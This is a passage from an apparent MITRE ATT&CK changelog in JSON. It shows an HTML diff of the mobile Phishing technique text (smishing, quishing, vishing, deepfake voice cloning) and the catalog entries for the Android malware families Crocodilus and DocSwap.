class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;\u201cspearphishing.\u201d&nbsp;Phishing&nbsp;often&nbsp;involves&nbsp;social&nbsp;engineering</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;\u201cspearphishing.\u201d&nbsp;Phishing&nbsp;often&nbsp;involves&nbsp;social&nbsp;engineering</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;as&nbsp;a&nbsp;trusted&nbsp;source,&nbsp;as&nbsp;well&nbsp;as&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;posing&nbsp;as&nbsp;a&nbsp;trusted&nbsp;source,&nbsp;as&nbsp;well&nbsp;as&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">evasion&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;removing&nbsp;or&nbsp;manipulating&nbsp;emails&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">evasion&nbsp;techniques,&nbsp;such&nbsp;as&nbsp;removing&nbsp;or&nbsp;manipulating&nbsp;emails&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;metadata/headers&nbsp;from&nbsp;compromised&nbsp;accounts&nbsp;being&nbsp;abused&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">or&nbsp;metadata/headers&nbsp;from&nbsp;compromised&nbsp;accounts&nbsp;being&nbsp;abused&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;send&nbsp;messages.&nbsp;&nbsp;Mobile&nbsp;phishing&nbsp;may&nbsp;take&nbsp;various&nbsp;forms.&nbsp;Fo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;send&nbsp;messages.&nbsp;&nbsp;Mobile&nbsp;phishing&nbsp;may&nbsp;take&nbsp;various&nbsp;forms.&nbsp;Fo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;example,&nbsp;adversaries&nbsp;may&nbsp;send&nbsp;emails&nbsp;containing&nbsp;malicious&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;example,&nbsp;adversaries&nbsp;may&nbsp;send&nbsp;emails&nbsp;containing&nbsp;malicious&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attachments&nbsp;or&nbsp;links,&nbsp;typically&nbsp;to&nbsp;deliver&nbsp;and&nbsp;then&nbsp;execute&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attachments&nbsp;or&nbsp;links,&nbsp;typically&nbsp;to&nbsp;deliver&nbsp;and&nbsp;then&nbsp;execute&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">malicious&nbsp;code&nbsp;on&nbsp;victim&nbsp;devices.&nbsp;Phishing&nbsp;may&nbsp;also&nbsp;be&nbsp;condu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">malicious&nbsp;code&nbsp;on&nbsp;victim&nbsp;devices.&nbsp;Phishing&nbsp;may&nbsp;also&nbsp;be&nbsp;condu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cted&nbsp;via&nbsp;third-party&nbsp;services,&nbsp;like&nbsp;social&nbsp;media&nbsp;platforms.&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cted&nbsp;via&nbsp;third-party&nbsp;services,&nbsp;like&nbsp;social&nbsp;media&nbsp;platforms.&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;also&nbsp;impersonate&nbsp;executives&nbsp;of&nbsp;organizations</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;also&nbsp;impersonate&nbsp;executives&nbsp;of&nbsp;organizations</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;persuade&nbsp;victims&nbsp;into&nbsp;performing&nbsp;some&nbsp;action&nbsp;on&nbsp;their&nbsp;be</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;persuade&nbsp;victims&nbsp;into&nbsp;performing&nbsp;some&nbsp;action&nbsp;on&nbsp;their&nbsp;be</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">half.&nbsp;For&nbsp;example,&nbsp;adversaries&nbsp;will&nbsp;often&nbsp;use&nbsp;social&nbsp;enginee</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">half.&nbsp;For&nbsp;example,&nbsp;adversaries&nbsp;will&nbsp;often&nbsp;use&nbsp;social&nbsp;enginee</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ring&nbsp;techniques&nbsp;in&nbsp;text&nbsp;messages&nbsp;to&nbsp;trick&nbsp;the&nbsp;victims&nbsp;into&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ring&nbsp;techniques&nbsp;in&nbsp;text&nbsp;messages&nbsp;to&nbsp;trick&nbsp;the&nbsp;victims&nbsp;into&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cting&nbsp;quickly,&nbsp;which&nbsp;leads&nbsp;to&nbsp;adversaries&nbsp;obtaining&nbsp;credenti</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cting&nbsp;quickly,&nbsp;which&nbsp;leads&nbsp;to&nbsp;adversaries&nbsp;obtaining&nbsp;credenti</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">als&nbsp;and&nbsp;other&nbsp;information.&nbsp;&nbsp;&nbsp;Mobile&nbsp;devices&nbsp;are&nbsp;a&nbsp;particular</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">als&nbsp;and&nbsp;other&nbsp;information.&nbsp;&nbsp;&nbsp;Mobile&nbsp;devices&nbsp;are&nbsp;a&nbsp;particular</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ly&nbsp;attractive&nbsp;target&nbsp;for&nbsp;adversaries&nbsp;executing&nbsp;phishing&nbsp;camp</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ly&nbsp;attractive&nbsp;target&nbsp;for&nbsp;adversaries&nbsp;executing&nbsp;phishing&nbsp;camp</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aigns.&nbsp;&nbsp;Due&nbsp;to&nbsp;their&nbsp;smaller&nbsp;form&nbsp;factor&nbsp;than&nbsp;traditional&nbsp;de</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">aigns.&nbsp;&nbsp;Due&nbsp;to&nbsp;their&nbsp;smaller&nbsp;form&nbsp;factor&nbsp;than&nbsp;traditional&nbsp;de</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sktop&nbsp;endpoints,&nbsp;users&nbsp;may&nbsp;not&nbsp;be&nbsp;able&nbsp;to&nbsp;notice&nbsp;minor&nbsp;diffe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sktop&nbsp;endpoints,&nbsp;users&nbsp;may&nbsp;not&nbsp;be&nbsp;able&nbsp;to&nbsp;notice&nbsp;minor&nbsp;diffe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rences&nbsp;between&nbsp;genuine&nbsp;and&nbsp;phishing&nbsp;websites.&nbsp;Further,&nbsp;mobil</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rences&nbsp;between&nbsp;genuine&nbsp;and&nbsp;phishing&nbsp;websites.&nbsp;Further,&nbsp;mobil</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;devices&nbsp;have&nbsp;additional&nbsp;sensors&nbsp;and&nbsp;radios&nbsp;that&nbsp;allow&nbsp;adve</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;devices&nbsp;have&nbsp;additional&nbsp;sensors&nbsp;and&nbsp;radios&nbsp;that&nbsp;allow&nbsp;adve</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rsaries&nbsp;to&nbsp;execute&nbsp;phishing&nbsp;attempts&nbsp;over&nbsp;several&nbsp;different&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rsaries&nbsp;to&nbsp;execute&nbsp;phishing&nbsp;attempts&nbsp;over&nbsp;several&nbsp;different&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vectors,&nbsp;such&nbsp;as:&nbsp;&nbsp;&nbsp;-&nbsp;SMS&nbsp;messages:&nbsp;Adversaries&nbsp;may&nbsp;send&nbsp;SMS</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vectors,&nbsp;such&nbsp;as:&nbsp;&nbsp;&nbsp;-&nbsp;SMS&nbsp;messages:&nbsp;Adversaries&nbsp;may&nbsp;send&nbsp;SMS</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;messages&nbsp;(known&nbsp;as&nbsp;\u201csmishing\u201d)&nbsp;from&nbsp;compromised&nbsp;devices&nbsp;to&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;messages&nbsp;(known&nbsp;as&nbsp;\u201csmishing\u201d)&nbsp;from&nbsp;compromised&nbsp;devices&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">potential&nbsp;targets&nbsp;to&nbsp;convince&nbsp;the&nbsp;target&nbsp;to,&nbsp;for&nbsp;example,&nbsp;in</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">potential&nbsp;targets&nbsp;to&nbsp;convince&nbsp;the&nbsp;target&nbsp;to,&nbsp;for&nbsp;example,&nbsp;in</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stall&nbsp;malware,&nbsp;navigate&nbsp;to&nbsp;a&nbsp;specific&nbsp;website,&nbsp;or&nbsp;enable&nbsp;cer</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">stall&nbsp;malware,&nbsp;navigate&nbsp;to&nbsp;a&nbsp;specific&nbsp;website,&nbsp;or&nbsp;enable&nbsp;cer</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tain&nbsp;insecure&nbsp;configurations&nbsp;on&nbsp;their&nbsp;device.&nbsp;-&nbsp;Quick&nbsp;Respon</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tain&nbsp;insecure&nbsp;configurations&nbsp;on&nbsp;their&nbsp;device.&nbsp;-&nbsp;Quick&nbsp;Respon</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">se&nbsp;(QR)&nbsp;Codes:&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;QR&nbsp;codes&nbsp;(known&nbsp;as&nbsp;\u201cquish</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">se&nbsp;(QR)&nbsp;Codes:&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;QR&nbsp;codes&nbsp;(known&nbsp;as&nbsp;\u201cquish</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing\u201d)&nbsp;to&nbsp;redirect&nbsp;users&nbsp;to&nbsp;a&nbsp;phishing&nbsp;website.&nbsp;For&nbsp;example,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ing\u201d)&nbsp;to&nbsp;redirect&nbsp;users&nbsp;to&nbsp;a&nbsp;phishing&nbsp;website.&nbsp;For&nbsp;example,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">an&nbsp;adversary&nbsp;could&nbsp;replace&nbsp;a&nbsp;legitimate&nbsp;public&nbsp;QR&nbsp;Code&nbsp;with&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">an&nbsp;adversary&nbsp;could&nbsp;replace&nbsp;a&nbsp;legitimate&nbsp;public&nbsp;QR&nbsp;Code&nbsp;with&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">one&nbsp;that&nbsp;leads&nbsp;to&nbsp;a&nbsp;different&nbsp;destination,&nbsp;such&nbsp;as&nbsp;a&nbsp;phishin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">one&nbsp;that&nbsp;leads&nbsp;to&nbsp;a&nbsp;different&nbsp;destination,&nbsp;such&nbsp;as&nbsp;a&nbsp;phishin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;website.&nbsp;A&nbsp;malicious&nbsp;QR&nbsp;code&nbsp;could&nbsp;also&nbsp;be&nbsp;delivered&nbsp;via&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;website.&nbsp;A&nbsp;malicious&nbsp;QR&nbsp;code&nbsp;could&nbsp;also&nbsp;be&nbsp;delivered&nbsp;via&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ther&nbsp;means,&nbsp;such&nbsp;as&nbsp;SMS&nbsp;or&nbsp;email.&nbsp;In&nbsp;the&nbsp;latter&nbsp;case,&nbsp;an&nbsp;adv</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ther&nbsp;means,&nbsp;such&nbsp;as&nbsp;SMS&nbsp;or&nbsp;email.&nbsp;In&nbsp;the&nbsp;latter&nbsp;case,&nbsp;an&nbsp;adv</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersary&nbsp;could&nbsp;utilize&nbsp;a&nbsp;malicious&nbsp;QR&nbsp;code&nbsp;in&nbsp;an&nbsp;email&nbsp;to&nbsp;pivo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ersary&nbsp;could&nbsp;utilize&nbsp;a&nbsp;malicious&nbsp;QR&nbsp;code&nbsp;in&nbsp;an&nbsp;email&nbsp;to&nbsp;pivo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;from&nbsp;the&nbsp;user\u2019s&nbsp;desktop&nbsp;computer&nbsp;to&nbsp;their&nbsp;mobile&nbsp;device.&nbsp;-</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">t&nbsp;from&nbsp;the&nbsp;user\u2019s&nbsp;desktop&nbsp;computer&nbsp;to&nbsp;their&nbsp;mobile&nbsp;device.&nbsp;-</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Phone&nbsp;Calls:&nbsp;Adversaries&nbsp;may&nbsp;call&nbsp;victims&nbsp;(known&nbsp;as&nbsp;<span class=\"diff_chg\">\u201cvishin</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Phone&nbsp;Calls:&nbsp;Adversaries&nbsp;may&nbsp;call&nbsp;victims&nbsp;(known&nbsp;as&nbsp;<span class=\"diff_chg\">\"vishin</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">g\u201d</span>)&nbsp;to&nbsp;persuade&nbsp;them&nbsp;to&nbsp;perform&nbsp;an&nbsp;action,&nbsp;such&nbsp;as&nbsp;providing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">g\"</span>)&nbsp;to&nbsp;persuade&nbsp;them&nbsp;to&nbsp;perform&nbsp;an&nbsp;action,&nbsp;such&nbsp;as&nbsp;providing</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;login&nbsp;credentials&nbsp;or&nbsp;navigating&nbsp;to&nbsp;<span class=\"diff_chg\">a&nbsp;malicious</span>&nbsp;website.&nbsp;Thi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;login&nbsp;credentials&nbsp;or&nbsp;navigating&nbsp;to&nbsp;<span class=\"diff_chg\">malicious</span>&nbsp;website<span class=\"diff_add\">s</span>.&nbsp;<span class=\"diff_add\">Comm</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;<span class=\"diff_chg\">could&nbsp;also</span>&nbsp;be&nbsp;used&nbsp;as&nbsp;a&nbsp;technique&nbsp;to&nbsp;perform&nbsp;the&nbsp;initial&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;vishing&nbsp;targets&nbsp;include&nbsp;employees,&nbsp;especially&nbsp;executives&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ccess&nbsp;on&nbsp;a&nbsp;mobile&nbsp;device,&nbsp;but&nbsp;then&nbsp;pivot&nbsp;to&nbsp;a&nbsp;<span class=\"diff_chg\">computer/other</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">of&nbsp;organizations,&nbsp;and&nbsp;help&nbsp;desks.&nbsp;</span>This&nbsp;<span class=\"diff_chg\">may&nbsp;also</span>&nbsp;be&nbsp;used&nbsp;as&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">&nbsp;networ</span>k&nbsp;by&nbsp;having&nbsp;the&nbsp;victim<span class=\"diff_chg\">&nbsp;perform&nbsp;an&nbsp;action&nbsp;on&nbsp;a</span>&nbsp;desktop</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;technique&nbsp;to&nbsp;perform&nbsp;the&nbsp;initial&nbsp;access&nbsp;on&nbsp;a&nbsp;mobile&nbsp;device,</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;computer.&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;but&nbsp;then&nbsp;pivot&nbsp;to&nbsp;a&nbsp;<span class=\"diff_chg\">des</span>k<span class=\"diff_add\">top&nbsp;computer</span>&nbsp;by&nbsp;having&nbsp;the&nbsp;victim<span class=\"diff_chg\">s&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">perform&nbsp;actions&nbsp;on&nbsp;a</span>&nbsp;desktop&nbsp;computer.&nbsp;<span class=\"diff_add\">With&nbsp;the&nbsp;rise&nbsp;of&nbsp;arti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ficial&nbsp;intelligence&nbsp;(AI),&nbsp;adversaries&nbsp;may&nbsp;also&nbsp;use&nbsp;AI&nbsp;to&nbsp;clo</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ne&nbsp;a&nbsp;person\u2019s&nbsp;voice,&nbsp;resulting&nbsp;in&nbsp;deepfake&nbsp;vishing.&nbsp;The&nbsp;clon</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed&nbsp;voice&nbsp;provides&nbsp;familiarity&nbsp;to&nbsp;the&nbsp;victims,&nbsp;increasing&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;likelihood&nbsp;of&nbsp;successful&nbsp;malicious&nbsp;actions&nbsp;performed&nbsp;by&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;victims.&nbsp;Additionally,&nbsp;adversaries&nbsp;may&nbsp;leave&nbsp;voicemails,&nbsp;wh</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ich&nbsp;may&nbsp;use&nbsp;a&nbsp;real&nbsp;person\u2019s&nbsp;voice&nbsp;or&nbsp;an&nbsp;AI-generated&nbsp;voice;&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">these&nbsp;scams&nbsp;would&nbsp;urgently&nbsp;ask&nbsp;victims&nbsp;into&nbsp;calling&nbsp;back&nbsp;to&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">perform&nbsp;an&nbsp;action,&nbsp;e.g.&nbsp;sending&nbsp;money&nbsp;or&nbsp;providing&nbsp;sensitive</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;information&nbsp;and&nbsp;credentials.&nbsp;</span></td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1011: User Guidance",
                            "M1058: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0684: Detection of Phishing"
                        ],
                        "new": [],
                        "dropped": []
                    }
                }
            ],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "software": {
            "additions": [
                {
                    "type": "malware",
                    "id": "malware--eed7b988-0279-4c4f-bfa9-d81f5444a04b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-02-06 21:22:59.796000+00:00",
                    "modified": "2026-04-23 03:24:47.669000+00:00",
                    "name": "Crocodilus",
                    "description": "[Crocodilus](https://attack.mitre.org/software/S9004) is an Android banking Trojan that was discovered in March 2025. [Crocodilus](https://attack.mitre.org/software/S9004) targeted users worldwide, including Turkey, Poland, Argentina, Brazil, Spain, the United States, Indonesia and India. [Crocodilus](https://attack.mitre.org/software/S9004) has been customized based on the target location. For example, [Crocodilus](https://attack.mitre.org/software/S9004) mimicked major Turkish and Spanish banks for users in Turkey and Spain, while users in Poland saw Facebook advertisements that promoted [Crocodilus](https://attack.mitre.org/software/S9004) to claim bonus points.(Citation: ThreatFabric_Crocodilus_March2025)(Citation: ThreatFabric_Crocodilus_June2025) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9004",
                            "external_id": "S9004"
                        },
                        {
                            "source_name": "ThreatFabric_Crocodilus_June2025",
                            "description": "ThreatFabric. (2025, June 3). Crocodilus Mobile Malware: Evolving Fast, Going Global. Retrieved November 24, 2025.",
                            "url": "https://www.threatfabric.com/blogs/crocodilus-mobile-malware-evolving-fast-going-global"
                        },
                        {
                            "source_name": "ThreatFabric_Crocodilus_March2025",
                            "description": "ThreatFabric. (2025, March 28). Exposing Crocodilus: New Device Takeover Malware Targeting Android Devices. Retrieved November 24, 2025.",
                            "url": "https://www.threatfabric.com/blogs/exposing-crocodilus-new-device-takeover-malware-targeting-android-devices"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Crocodilus"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Liran Ravich, CardinalOps"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--3dbef387-12df-4547-9dd3-075c7ffec9e3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-02-16 15:40:59.504000+00:00",
                    "modified": "2026-04-23 02:05:27.803000+00:00",
                    "name": "DocSwap",
                    "description": "[DocSwap](https://attack.mitre.org/software/S9005) is an Android malware first identified in 2025, and attributed to [Kimsuky](https://attack.mitre.org/groups/G0094). [DocSwap](https://attack.mitre.org/software/S9005)\u2019s name is a combination of its Korean name \u201c\ubb38\uc11c\uc5f4\ub78c \uc778\uc99d \uc571\u201d (Document Viewing Authentication App) and a phishing page masquerading as CoinSwap at the C2 address. Based on [DocSwap](https://attack.mitre.org/software/S9005)\u2019s name and Korean-language strings, [DocSwap](https://attack.mitre.org/software/S9005) potentially targets mobile device users in South Korea. Several variants of [DocSwap](https://attack.mitre.org/software/S9005) exist; one of the latest samples indicates that the adversary added a native decryption function that decrypts an internal APK.(Citation: EnkiWhiteHat_KimsukyDOCSWAP_Dec2025)(Citation: S2W_DocSwap_Mar2025) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9005",
                            "external_id": "S9005"
                        },
                        {
                            "source_name": "EnkiWhiteHat_KimsukyDOCSWAP_Dec2025",
                            "description": "EnkiWhiteHat. (2025, December 16). Kimsuky Distributing Malicious Mobile App via QR Code. Retrieved January 8, 2026.",
                            "url": "https://www.enki.co.kr/en/media-center/blog/kimsuky-distributing-malicious-mobile-app-via-qr-code"
                        },
                        {
                            "source_name": "S2W_DocSwap_Mar2025",
                            "description": "Kim, H., S2W TALON. (2025, March 13). Detailed Analysis of DocSwap Malware Disguised as Security Document Viewer. Retrieved January 12, 2026.",
                            "url": "https://medium.com/s2wblog/detailed-analysis-of-docswap-malware-disguised-as-security-document-viewer-218a728c36ff"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "DocSwap"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Wai Linn Oo, Kernellix Co.,Ltd."
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
